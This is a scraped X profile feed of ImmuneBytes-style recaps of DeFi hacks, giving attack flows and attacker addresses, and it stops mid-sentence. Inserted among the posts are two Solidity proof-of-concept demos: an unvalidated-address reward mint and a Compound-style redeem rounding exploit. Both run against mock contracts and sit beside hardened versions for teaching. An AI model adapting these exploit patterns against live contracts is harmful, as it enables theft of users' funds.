Naveen

495 posts

@cryptedtech

Motto in Life: Learning makes learned. Humility makes human

Joined October 2022
400 Following, 32 Followers
Naveen retweeted
On Aug 1, the defi protocol @Convergence_fi was exploited for ~$210k when the hacker exploited a vulnerability in the CvxRewardDistributor contract. In an official post on their ‘X’ handle, @Convergence_fi has advised its users not to interact with the protocol and to withdraw assets staked on the platform.

The 58M CVG stolen by the exploiter were part of tokens dedicated to staking emissions. In addition, the hacker also got away with $2,000 of unclaimed rewards from Convex. The attacker was initially funded through the infamous Tornado Cash by address etherscan.io/address/0x912c… After the exploit, the CVG token prices took a major hit and have not recovered since.

The Vulnerability
The vulnerable CvxRewardDistributor contract is responsible for minting CVG rewards to eligible stakers and holding the rewards claimed from Convex, which in turn can be claimed by the stakers. Due to a bug, the input given by the user in the function claimMultipleStaking() of the said contract was not being validated. The hacker manipulated this bug to deploy a malicious contract to mint all tokens meant for staking emissions (58,000,000 CVG), only to dump the newly minted CVG into liquidity pools.

Why Was This Bug Not Fixed in the Audit?
To achieve gas optimization, the developers had modified/removed the line from the smart contract's code which validated the user input given to the function claimMultipleStaking(). These changes were made post-audit; therefore, the auditors couldn’t have done anything to avoid the exploit.

Hack Technical Details
Attacker Address: etherscan.io/address/0x0356…
Attack Txn: etherscan.io/tx/0x636be30e5…
Attack Contract Address: etherscan.io/address/0xee45…
Target contract: CvxRewardDistributor etherscan.io/address/0x2b08…

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts
Naveen retweeted
On July 24, 2024, the decentralized exchange and staking platform MonoSwap @monoswapio on the Blast chain was exploited, resulting in a significant loss of approximately 💰$1.3M.

How Did the Hack Happen?
In an official post on their X handle, @monoswapio claimed that the exploit was carried out with the help of a botnet (malware), which the hackers installed on one of their developers' office PCs while they were on a call with the developer, pretending to be VCs (Venture Capitalists) interested in making investments in the MonoSwap protocol. Through some surreptitious or social engineering method, they were able to install the malware on the PC, which had access to literally all MonoSwap-related wallets and contracts. As soon as the hackers broke in, they drained the staked liquidity positions.

The malware infected the PC when the unaware developer downloaded a malicious app through a phishing link shared by the scammers. The malicious app looked similar to KakaoTalk, a mobile messaging app for smartphones.

The Hack Aftermath
As soon as the hack became known, MonoSwap warned its users against adding liquidity or stakes to their farming pools until the exploit was fixed. They also advised users to withdraw their staked positions urgently to avoid losing funds in the hack. The hack is currently being investigated, and MonoSwap will soon release updates about the hack and fund recovery.

The Total Value Locked (TVL) for this protocol dropped significantly from approximately $1.5 million to $200,000 as a result of the exploit.

The hacker withdrew funds to the address 0x895a80371fc0e6987e27ddc7aa0e851bc3538ea8, only to bridge them to the Ethereum address 0xd30eBC0a9AcdA91d383675EAAB3ff24f06d07eCE. Later, all the bridged funds (371 $ETH) were transferred to Tornado Cash.

How to Avoid Getting Scammed by Crypto Scammers?
This article highlights many red flags which can help you in identifying the fraudulent actors in the crypto space.
💡immunebytes.com/blog/beginners…

Also, read about different types of phishing scams that are prevalent in the Web3 space.
💡immunebytes.com/blog/zero-valu…
💡immunebytes.com/blog/ice-phish…
💡immunebytes.com/blog/what-is-a…

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts
Naveen retweeted
🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks

On July 24, 2023, the decentralized exchange @Palmswaporg, on the Binance smart chain, was exploited for ~💰$900k by manipulating a smart contract vulnerability.

The Smart Contract Vulnerability
The primary reason for the exploit was a flaw in the calculations used to add or remove liquidity from the pool. This calculation was made to determine the exchange rate between USDP (Palm USD) and PLP (Palm LP). The getAum() function, which calculated the PLP price after removing liquidity, was dependent upon the value of PoolAmount. Due to the miscalculation, the price of PLP increased every time buyUSDP() was called to buy USDP. The hacker manipulated this miscalculation and made profits due to the difference in the exchange rate between USDP and PLP while removing and adding liquidity. The analysis showed that the hacker used a buying exchange rate of 1:1, whereas the selling exchange rate was 1:1.9, which explains the profit of ~$900k.

How to Prevent Such Hacks?
👉 @ImmuneBytes offers reliable and effective smart contract and blockchain security audit services that can help prevent possible exploits by malicious actors in the Web3 space.
Reach out for an audit for your Web3 project at 🔍 🔎immunebytes.com/contact-us/

Technical Details of the Hack:
Attacker Address: bscscan.com/address/0xF84e…
Victim Contract: bscscan.com/address/0x5525…
Exploit Transaction: bscscan.com/tx/0x62dba5505…

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts
Naveen retweeted
In a major security breach on July 18, @WazirXIndia, one of the largest cryptocurrency exchanges in India, was hacked for an astonishing ~💰$234M. As per the official release by WazirX India, the breach happened in one of the multisig wallets. WazirX India is currently conducting a thorough investigation into the hack.

To contain the damage caused by the exploit, INR and crypto withdrawals have been temporarily paused.

The exploiter's address involved in the exploit is reportedly funded by Tornado Cash. To obfuscate the stolen funds trail, the exploiter has transferred stolen assets to multiple addresses before swapping them for Ethereum (ETH) using Uniswap. The swapped crypto assets include $PEPE, $GALA, and $USDT. The exploiter continues to move funds to multiple addresses even at the time of reporting this.

List of Stolen Tokens with Their Value
bit.ly/3Y9vOqN

Victim Address: etherscan.io/address/0x27fd…
Hacker Address: etherscan.io/address/0x04b2…

😈Other Malicious Addresses Used for Stolen Fund Movement
etherscan.io/address/0x35fe… (WazirX Exploiter 2)
etherscan.io/address/0x90ca… (WazirX Exploiter 3)
etherscan.io/address/0x90ca…
etherscan.io/address/0x90ca…

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts
Naveen @cryptedtech
RT @ImmuneBytes: On July 16, @lifiprotocol was exploited to steal ~💰$9.7M worth of crypto assets on the Ethereum and Arbitrum chains. The l…
Naveen retweeted
On July 14, the cryptocurrency lending protocol @Minterest on the #mantle chain was exploited for ~💰$1.4M. The hack investigation is currently underway to uncover the reasons behind the exploit. Meanwhile, Minterest has temporarily paused its “Supply & Borrow” and “Repay & Withdraw” services to investigate and contain the hack.

The attacker was initially funded by the infamous @TornadoCash on the #ETH chain. As per the last update, the hacker has bridged the stolen funds (~428 ETH) to #ETH.

Stolen Funds: The stolen funds were moved to two contract addresses by the exploiter.
👉mantlescan.xyz/address/0xf762…
👉mantlescan.xyz/address/0x4c1d…

Was Minterest Ever Audited?
As per the blog published on the official website on Nov 8, 2023, it has undergone 7 security audits by 4 different security audit companies. Whether it was an insider job, compromised security keys, or a smart contract vulnerability will be known once the detailed hack analysis report is out and shared with the community.
Ref: minterest.com/blog/minterest…

Technical Details of the Hack
Hacker Address: mantlescan.xyz/address/0x618F…
Txn hash: mantlescan.xyz/tx/0xb3c4c313a…
Exploited Contract: mantlescan.xyz/address/0x9b50…

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts
Naveen retweeted
Just in: On July 12, the defi protocol @DoughFina on the #Ethereum chain was exploited for ~💰$1.8M worth of crypto assets. @DoughFina has already acknowledged the hack through its official X handle.

Although the hack investigation is still underway, the likely cause behind the exploit is an access control vulnerability involving unvalidated call data in the ConnectorDeleverageParaswap contract.
💡Learn more about Access Control Vulnerabilities in smart contracts here: immunebytes.com/blog/access-co…

The attacker was initially funded through #Railgun, and at the time of this report, the hacker has already swapped all stolen $USDC into $ETH.
💡Do you know Railgun and Tornado Cash are not the only tools used by hackers to obfuscate the stolen funds trail? See other tools: immunebytes.com/blog/top-torna…

Efforts of Fund Recovery
The team @DoughFina has sent an on-chain message to the hacker in a bid to open a negotiation channel with them and discuss the return of stolen funds. In the message, the hacker has been asked to cooperate and return the stolen funds. The deadline for returning funds has been set as July 15, 2024, 23:00 UTC, failing which the hacker would have to bear the consequences of legal action.
On-chain message txn: etherscan.io/tx/0x38ad3247c…
Stolen funds are currently parked at etherscan.io/address/0x2913…

Technical Details of the Hack
Attacker: etherscan.io/address/0x6710…
Attack contract: etherscan.io/address/0x11a8…
Target contract: etherscan.io/address/0x9f54…
Attack transaction: etherscan.io/tx/0x92cdcc732…

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts
Naveen retweeted
🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks

On 😈July 10, 2022, the Omni Protocol, a decentralized finance (DeFi) platform, was compromised in a significant security breach. The exploit resulted in the loss of approximately 💰$1.4 million worth of cryptocurrency.

📌Reason for the Hack
The hack occurred due to a reentrancy vulnerability in Omni Protocol's smart contract code. Reentrancy attacks exploit the way smart contracts handle external calls, allowing an attacker to repeatedly call a function before the initial execution is complete. This specific vulnerability was not adequately addressed in the contract's logic, leaving it open to exploitation.
💡Must Read: The Ultimate Guide to Reentrancy Attacks immunebytes.com/blog/reentranc…
Do you know there are hundreds of crypto hacks where reentrancy was used to conduct the exploit? Here is the list of all such hacks:
⬇️immunebytes.com/blog/list-of-r…

📌Attack Flow
👉Identification of Vulnerability: The attacker identified a reentrancy vulnerability in one of the Omni Protocol's smart contracts. This vulnerability allowed the attacker to call a function repeatedly before the contract's state was updated.
👉Deploying Malicious Contract: The attacker deployed a malicious contract designed to exploit the vulnerability. This contract interacted with the vulnerable Omni Protocol contract.
👉Initiating the Attack: The attacker initiated a withdrawal function from the Omni Protocol. The vulnerable contract transferred funds to the attacker's contract before updating its own balance.
👉Reentrancy Exploit: Taking advantage of the reentrancy bug, the attacker's contract made recursive calls to the withdrawal function. Since the vulnerable contract had not yet updated its balance, it continued to transfer funds to the attacker's contract.
👉Draining Funds: The attacker repeated this process multiple times within a single transaction, rapidly draining funds from the Omni Protocol.

📌How to Prevent Such Hacks?
👉 @ImmuneBytes offers reliable and effective smart contract and blockchain security audit services that can help prevent possible exploits by malicious actors in the Web3 space. Reach out for an audit for your Web3 project at 🔍 🔎immunebytes.com/contact-us/
Or connect with us here t.me/immunebytes

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts
Naveen retweeted
On July 2, 2024, the WMRP token contract on the #BNB chain was exploited for 103 BNB worth ~💰$58k. The attack was carried out by manipulating the price of MRP using a reentrancy attack.

The detailed hack analysis is underway, but executing crypto exploits using reentrancy is not a novel approach. Look at the list of crypto hacks conducted using reentrancy in the history of Web3:
💡immunebytes.com/blog/list-of-r…
Learn more about reentrancy attacks in crypto here:
💡immunebytes.com/blog/reentranc…

Technical Details
Attacker: bscscan.com/address/0x132d…
Attack contract: bscscan.com/address/0x2bd8…
Target contract: bscscan.com/address/0x35f5…
Exploit Txn: bscscan.com/tx/0x4353a6d37…

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity
Naveen retweeted
🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks

June 27, 2023, marks the day of the exploit for Themis Protocol, a decentralized lending and borrowing platform on the #Arbitrum chain. The exploit caused losses of ~💰$370K to the protocol.

The attack was carried out by manipulating the Balancer LP token price oracle, which resulted in an inflated price for B-wstETH-WETH-Stable-gauge. This eventually led to the exploiter making significant profits through flash loans.
💡Blockchain Oracles & Their Use Cases immunebytes.com/blog/explained…

Technical Details of Hack
Attacker's address: arbiscan.io/address/0xDb73…
Exploited contract: arbiscan.io/address/0x75f8…
Attack Transaction: arbiscan.io/tx/0xff368294c…

The Stolen Funds
After stealing the funds, the Themis Protocol exploiter cross-chained through Stargate Finance. The funds were swapped for ETH and subsequently moved to the address etherscan.io/address/0xDb73… At a later date, the exploiter moved 191 ETH to Tornado Cash, a coin-mixing service often used by hackers to obfuscate the trail of stolen funds.

Not the First Price Manipulation Exploit in Crypto!
Oracle price manipulation exploits are not new in the blockchain world. Look at the list of other crypto hacks where the hacker employed more or less similar techniques to carry out an exploit.
💡immunebytes.com/blog/list-of-o…

Mitigation Steps
The following methods can help combat price manipulation attacks and minimize losses.
👉Multi-Oracle Approach
👉Data Source Diversification
👉Data Verification
👉Time Stamping
👉Threshold Signatures
👉Randomized Oracles
👉Decentralized Oracles
👉Off-Chain Data Verification
👉Emergency Shutdown Mechanisms
👉Regular Audits and Monitoring
Find the detailed blog here: 💡immunebytes.com/blog/what-are-…

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity
Naveen retweeted
🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks

On June 26, 2022, the NFT lending pool @XCarnival_Lab’s XToken lending contract on #ethereum was exploited for ~💰$3.8M (~3,087 $ETH).

The hack was a result of a smart contract vulnerability, which allowed the hacker to use withdrawn pledged NFTs as collateral and drain the funds.

The Attack Flow:
1️⃣ The hacker gets funded with 120 ETH from the cryptocurrency mixer Tornado Cash.
2️⃣ Deploy the attack contract (0xf70F...cA8d).
3️⃣ Use 87 ETH from this fund to buy the BAYC NFT with ID 5110 and transfer BAYC 5110 to the attack contract.
4️⃣ Use the attack contract (0xf70F...cA8d) for bulk creation of pledge records.
5️⃣ As there was no restriction on the XToken address in the pledge, the attacker easily passes his own pre-deployed attack address for calling IXToken(xToken).borrow.
6️⃣ The attacker’s XToken avoids borrowing funds in the pledge record to withdraw the pledged NFT immediately at will.
7️⃣ Due to the logical flaw, the pledge record of XToken is not updated; only the marker of whether the NFT is withdrawn is modified.
8️⃣ The attacker creates multiple attack contracts and then repeatedly transfers the NFT to repeat the previous steps, creating multiple abnormal pledge records.
9️⃣ Since the borrow verification does not verify the status of the NFT but only verifies the order ID, the exploiter uses these multiple abnormal pledge records to borrow a large sum.
🔟 The attacker transfers the profits to his wallet address.

What Could Have Prevented It?
This hack could have been avoided if the XToken address had had a whitelist for restriction and verification, and if the business logic had been set to verify the status of the collateral multiple times. The NFT staking time could have been limited to ensure it could not be withdrawn instantaneously.

@ImmuneBytes, one of the leading and experienced 🔎Blockchain and Smart Contract security auditors in the Web3 space, has expertise in detecting such business logic flaws and vulnerabilities in all types of projects in the Web3 space. Connect here to learn more about our multi-layer audit process:
🔗t.me/immunebytes
🔗immunebytes.com/contact-us/

Technical Details
👉Attack Txn: 0x51cbfd46f21afb44da4fa971f220bd28a14530e1d5da5009cfbdfee012e57e35
👉Pledge Records Creation Txn: 0x60a3143c1c7a40d650e9e319d99425da5a87604f474279765f4ffbc0c4c375c2
👉Hacker’s address: 0xb7cbb4d43f1e08327a90b32a8417688c9d0b800a
👉Attack Contracts
0xf70F691D30ce23786cfb3a1522CFD76D159AcA8d
0x3edf976dF38f7d6273884B4066e3689Ef547D816
0x7b5a2f7cd1cc4eef1a75d473e1210509c55265d8
0x234e4B5FeC50646D1D4868331F29368fa9286238
👉Official Contracts
XToken 0x5417da20ac8157dd5c07230cfc2b226fdcfc5663
XNFT 0x39360ac1239a0b98cb8076d4135d0f72b7fd9909
P2Controller 0x34ca24ddcdaf00105a3bf10ba5aae67953178b85

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity
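The XCarnival post above (no restriction on the XToken address passed in the pledge) and the Convergence post earlier on this page (unvalidated input to claimMultipleStaking()) describe the same bug class: a contract address supplied by the caller is trusted and called as if it were one of the protocol's own. The block below is an added example, not code from Convergence, XCarnival or ImmuneBytes. The IStaking interface, the MockCvg token, the FakeStaking contract, the isStakingContract registry and the amounts are assumptions made for the demo; the 58,000,000 figure is simply the number quoted in the Convergence post.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not Convergence's or XCarnival's code. IStaking, MockCvg,
// FakeStaking and the isStakingContract registry are assumptions for the demo.

interface IStaking {
    // Reports (and resets) the reward `account` may claim; the distributor
    // mints that many tokens on the strength of this answer alone.
    function claimCvgRewards(address account) external returns (uint256);
}

interface IMintable {
    function mint(address to, uint256 amount) external;
}

// Stand-in reward token with an open mint so the distributors below can call it.
contract MockCvg is IMintable {
    mapping(address => uint256) public balanceOf;
    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }
}

// Vulnerable: every address in `stakingContracts` is called as if it were a
// genuine staking contract, so a caller can pass a contract of their own.
contract VulnerableDistributor {
    IMintable public immutable cvg;
    constructor(IMintable _cvg) { cvg = _cvg; }

    function claimMultipleStaking(address[] calldata stakingContracts) external {
        uint256 total;
        for (uint256 i = 0; i < stakingContracts.length; i++) {
            total += IStaking(stakingContracts[i]).claimCvgRewards(msg.sender);
        }
        cvg.mint(msg.sender, total);
    }
}

// The attacker's "staking contract": reports whatever reward it was built with.
contract FakeStaking is IStaking {
    uint256 public immutable amount;
    constructor(uint256 _amount) { amount = _amount; }
    function claimCvgRewards(address) external view returns (uint256) { return amount; }
}

// Hardened: the same loop, but only contracts registered by the owner may be
// called. This is the kind of check the Convergence post says was dropped.
contract HardenedDistributor {
    IMintable public immutable cvg;
    address public immutable owner;
    mapping(address => bool) public isStakingContract;

    constructor(IMintable _cvg) { cvg = _cvg; owner = msg.sender; }

    function setStakingContract(address staking, bool allowed) external {
        require(msg.sender == owner, "not owner");
        isStakingContract[staking] = allowed;
    }

    function claimMultipleStaking(address[] calldata stakingContracts) external {
        uint256 total;
        for (uint256 i = 0; i < stakingContracts.length; i++) {
            address staking = stakingContracts[i];
            require(isStakingContract[staking], "unknown staking contract");
            total += IStaking(staking).claimCvgRewards(msg.sender);
        }
        cvg.mint(msg.sender, total);
    }
}

// Deploy and call run(): the vulnerable distributor mints the attacker's chosen
// 58,000,000 tokens on the fake contract's say-so; the hardened one reverts on
// the same input because the fake address was never registered.
contract Demo {
    function run() external returns (uint256 mintedFromVulnerable, bool hardenedRejected) {
        MockCvg cvg = new MockCvg();
        address[] memory targets = new address[](1);
        targets[0] = address(new FakeStaking(58_000_000 * 1e18));

        VulnerableDistributor v = new VulnerableDistributor(cvg);
        v.claimMultipleStaking(targets);
        mintedFromVulnerable = cvg.balanceOf(address(this));

        HardenedDistributor h = new HardenedDistributor(cvg);
        try h.claimMultipleStaking(targets) { hardenedRejected = false; }
        catch { hardenedRejected = true; }
    }
}
```

The XCarnival variant is the same check in a different place: the pledge record should only accept an xToken address that the controller has registered, and the borrow path should re-verify the collateral's status rather than trust the order ID alone. A registry lookup costs one SLOAD per iteration; the Convergence post attributes the removal of the check to gas optimisation, which is the trade-off this example is meant to make visible.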
Naveen retweeted
🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks

Harmony’s Horizon Bridge, a cross-chain bridge, was exploited for 💰$100M on June 24, 2022. The hacker used compromised private keys in the @harmonyprotocol and stole multiple cryptocurrencies, including ETH, USDC, WBTC, USDT, DAI, BUSD, AAG, FXS, SUSHI, AAVE, WETH, and FRAX.

Good Read:
💡immunebytes.com/blog/compromis…
💡immunebytes.com/blog/public-an…

How did the Exploit Happen?
The Harmony Horizon Bridge used a multi-signature, or “multisig”, wallet for the validation process. The transaction approval required validation from five validators. However, the bridge was utilizing only two validators instead of five to secure itself, which meant the attacker only needed access to 2 private keys to carry out the attack. The hacker moved stolen funds to Tornado Cash to obfuscate the stolen fund trail. Post-hack, the number of validators in the multi-signature was changed from 2 to 4.

List of Crypto Hacks Due to Private Key Compromise
💡immunebytes.com/blog/list-of-c…

Technical Details
The two (multisig) addresses that were compromised:
etherscan.io/address/0xf845…
etherscan.io/address/0x812d…
Exploiter address: etherscan.io/address/0x0d04…
Harmony ETH Bridge: etherscan.io/address/0xf9fb…
Harmony ERC20 Bridge: etherscan.io/address/0x0d04…
Harmony BUSD Bridge: etherscan.io/address/0xf9fb…

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity
Naveen retweeted
🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks

On June 17, 2023, the defi protocol Midas Capital on the BNB chain was exploited to steal 💰$600K worth of crypto assets.

The critical vulnerability responsible for the exploit at Midas Capital was a rounding issue within its lending protocol. This protocol, a derivative of Compound Finance's V2 codebase, had a flawed redemption process, which the attacker manipulated using a rounding issue and flash loans.
The detailed analysis of the Midas Capital hack can be found here: immunebytes.com/blog/midas-cap…

🤔Coincidentally, the same rounding issue was behind the 💰$7.4M exploit of @HundredFinance in April 2023. immunebytes.com/blog/hundred-f…
Useful Read: immunebytes.com/blog/precision…

How to Prevent Such Hacks?
The exploiter carried out the attack by exploiting a vulnerability in the smart contract which could have been identified by a detailed and careful analysis of the smart contract before its deployment on the mainnet.
👉 @ImmuneBytes offers reliable and effective smart contract and blockchain security audit services that can help in preventing possible exploits by malicious actors of the Web3 space.
Reach out for an audit for your Web3 project at 🔍 🔎immunebytes.com/contact-us/
You can also connect with us here t.me/immunebytes

#Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity
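The post above names the bug class (a rounding issue in a Compound V2-style redemption) without showing the arithmetic, so here is an added example of it. This is a stripped-down model written for this page, not Midas Capital's, Hundred Finance's or Compound's code: there is no interest, borrowing or reserve accounting, `cash` stands in for the market's underlying token balance, and donate() stands in for a plain ERC-20 transfer straight to the market contract. What it shows is that redeemUnderlying() truncates the number of cTokens to burn, and once the exchange rate has been pushed high enough by a donation, that truncation is worth almost a whole cToken per redemption.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration of the redeem rounding issue in Compound V2-style markets;
// a stripped-down model, not Midas Capital's, Hundred Finance's or Compound's
// code. No interest, borrows or reserves: `cash` stands in for the underlying
// balance and donate() for a direct ERC-20 transfer to the market.

contract MiniCToken {
    uint256 public cash;
    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;
    uint256 public constant INITIAL_RATE = 2e16; // 0.02 underlying per cToken, 1e18-scaled
    bool public immutable roundUp;               // hardened variant rounds against the redeemer

    constructor(bool _roundUp) { roundUp = _roundUp; }

    // Compound V2: exchangeRate = (cash + borrows - reserves) * 1e18 / totalSupply.
    // Anything sent to the market without minting raises it for every holder.
    function exchangeRate() public view returns (uint256) {
        return totalSupply == 0 ? INITIAL_RATE : cash * 1e18 / totalSupply;
    }

    function mint(uint256 underlying) external {
        uint256 tokens = underlying * 1e18 / exchangeRate();
        cash += underlying;
        totalSupply += tokens;
        balanceOf[msg.sender] += tokens;
    }

    function donate(uint256 underlying) external { cash += underlying; }

    // redeemUnderlying: cTokens to burn = underlying * 1e18 / rate. Compound V2
    // truncates; when one cToken is worth a huge amount of underlying, the
    // truncated fraction is worth nearly a whole cToken to the redeemer.
    function redeemUnderlying(uint256 underlying) external {
        uint256 rate = exchangeRate();
        uint256 tokens = underlying * 1e18 / rate;
        if (roundUp && tokens * rate < underlying * 1e18) tokens += 1; // round against the caller
        require(balanceOf[msg.sender] >= tokens, "insufficient cTokens");
        require(cash >= underlying, "insufficient cash");
        balanceOf[msg.sender] -= tokens;
        totalSupply -= tokens;
        cash -= underlying;
    }
}

// Deploy and call run(): in the truncating market the attacker burns one cToken
// for just under two cTokens' worth of underlying; in the rounding-up market the
// same request costs two cTokens.
contract Demo {
    function run() external returns (uint256 burnedVuln, uint256 burnedSafe, uint256 underlyingOut) {
        (burnedVuln, underlyingOut) = _attack(new MiniCToken(false));
        (burnedSafe, ) = _attack(new MiniCToken(true));
    }

    function _attack(MiniCToken m) internal returns (uint256 burned, uint256 out) {
        m.mint(1);          // 1 wei of underlying -> 50 cTokens; attacker is the only supplier
        m.donate(500e18);   // push 500 whole tokens in without minting (flash-loaned in practice)
        uint256 rate = m.exchangeRate();   // now ~1e37: each cToken wei is worth ~10 whole tokens
        out = 2 * rate / 1e18 - 1;         // just under the value of two cTokens
        uint256 before = m.balanceOf(address(this));
        m.redeemUnderlying(out);
        burned = before - m.balanceOf(address(this));
    }
}
```

The rounding is only half of the real attack: the inflated exchange rate also inflates the value of the remaining cTokens as collateral, which is what the flash-loaned borrow in the post monetises. Rounding in the protocol's favour closes the redeem leg; seeding every market with a non-withdrawable minimum supply (or virtual shares) so that a lone supplier cannot drive the rate to extremes closes the collateral leg.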
Naveen retweeted
🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks

On June 12, 2023, the defi protocol Sturdy Finance was exploited due to a smart contract vulnerability. In the attack, @SturdyFinance lost 442 ETH worth ~$775k.

The manipulated vulnerability was read-only reentrancy in Balancer, which led to the exploit by allowing a faulty price oracle to determine the cB-stETH-STABLE asset price and consequently helped the exploiter in making illicit profits.
The detailed analysis report for the hack can be found here: immunebytes.com/blog/sturdy-fi…

How to Tackle Read-Only Reentrancy Attacks?
This hack could have been prevented if the developers had taken the following precautions and steps:
